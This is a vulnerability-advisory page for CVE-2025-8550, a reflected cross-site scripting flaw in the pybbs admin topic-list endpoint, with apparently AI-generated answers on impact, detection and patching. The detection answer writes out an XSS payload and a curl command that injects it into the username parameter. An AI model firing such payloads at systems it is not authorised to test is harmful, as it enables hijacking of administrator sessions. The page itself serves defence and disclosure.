CVE-2025-8550
BaseFortify
Publication date: 2025-08-05
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| pybbs_project | pybbs | to 6.0.0 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-8550 is a Reflected Cross-Site Scripting (XSS) vulnerability in the atjiu pybbs application up to version 6.0.0. It occurs in the /admin/topic/list endpoint where user-controllable parameters, especially the username argument, are not properly encoded or sanitized before being displayed. This allows an attacker to inject malicious scripts that are reflected back to administrator users' browsers, enabling execution of arbitrary JavaScript code remotely. Exploitation requires authentication and some user interaction, and a proof-of-concept exploit is publicly available. [1, 2, 3]
How can this vulnerability impact me? :
This vulnerability can impact you by allowing attackers to execute arbitrary JavaScript code in the context of administrator users' browsers. This can lead to session hijacking, unauthorized actions performed with administrator privileges, and compromise of application security. Since the attack targets administrators, it can result in significant control over the application and its data. The vulnerability can be exploited remotely after authentication and user interaction. [1, 2, 3]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the /admin/topic/list endpoint for reflected cross-site scripting (XSS) by injecting payloads into the username parameter and observing if the script is executed. For example, you can use curl or a browser-based tool to send a request with a payload such as `1"><img src=1 onerror=alert(9)>` in the username parameter and check if an alert or script execution occurs. A sample curl command might be: `curl -i -G --data-urlencode "username=1\"><img src=1 onerror=alert(9)>" https://your-pybbs-instance/admin/topic/list`. Monitoring HTTP responses for reflected script tags or suspicious input in the response body can help detect the vulnerability. Additionally, using web vulnerability scanners that test for reflected XSS on this endpoint can automate detection. [2]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to apply the patch identified by commit 2fe4a51afbce0068c291bc1818bbc8f7f3b01a22, which introduces a centralized XSS sanitization filter and aspect that sanitize all incoming HTTP request parameters and JSON payloads. This patch removes unsafe inline sanitization and replaces it with a robust filtering mechanism using Jsoup's Whitelist.basic() policy. Until the patch can be applied, it is recommended to restrict access to the /admin/topic/list endpoint to trusted administrators only, use web application firewalls (WAF) to block suspicious input patterns, and educate administrators to avoid clicking on suspicious links that might exploit this reflected XSS vulnerability. [3, 4]